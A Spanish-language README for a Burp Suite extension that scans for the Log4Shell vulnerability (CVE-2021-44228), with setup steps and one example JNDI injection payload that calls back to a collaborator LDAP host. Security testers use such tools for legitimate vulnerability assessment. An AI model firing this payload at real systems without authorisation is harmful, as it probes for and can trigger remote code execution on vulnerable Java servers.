Extensión de Burp para escanear la vulnerabilidad Log4Shell (CVE-2021-44228) con payloads personalizados.
Descargo de responsabilidad
No soy responsable de tus acciones, de que Burp Suite se congele, de que el objetivo sea hackeado, de una guerra termonuclear, o de la crisis económica actual causada por seguir estas instrucciones. TÚ eliges usar esta herramienta, y si me señalas por haber estropeado algo, me reiré de ti.
Instrucciones:
Instala la extensión ya sea desde los lanzamientos precompilados o compilando desde el código fuente.
Deshabilita/Desmarca todas las demás extensiones de escaneo activo como active scan++, burp bounty pro, param-miner, etc.
Desde el menú superior abre la configuración de Log4J Scanner.
Añade tu payload personalizado y guarda la configuración.
Selecciona tu objetivo > clic derecho > Scan.
Selecciona Scan Configuration > Select from library
Solo selecciona Audit checks - extensions only y haz clic en OK.
Agradecimientos especiales a Silent Signal, las instrucciones y configuraciones de escaneo están inspiradas en su extensión.
Instrucciones importantes a recordar:
En tu payload personalizado NO agregues la URL de tu colaborador, solo añade [collaborator-server] como marcador de posición,
[collaborator-server será reemplazado por la URL de tu servidor colaborador.
Ejemplo de payload: "${jndi:ldap://[collaborator-server]/a}
Esto fue codificado por mí en un día y es un lanzamiento inicial, pueden ocurrir errores, todos los informes de errores, sugerencias y solicitudes de extracción son bienvenidos :)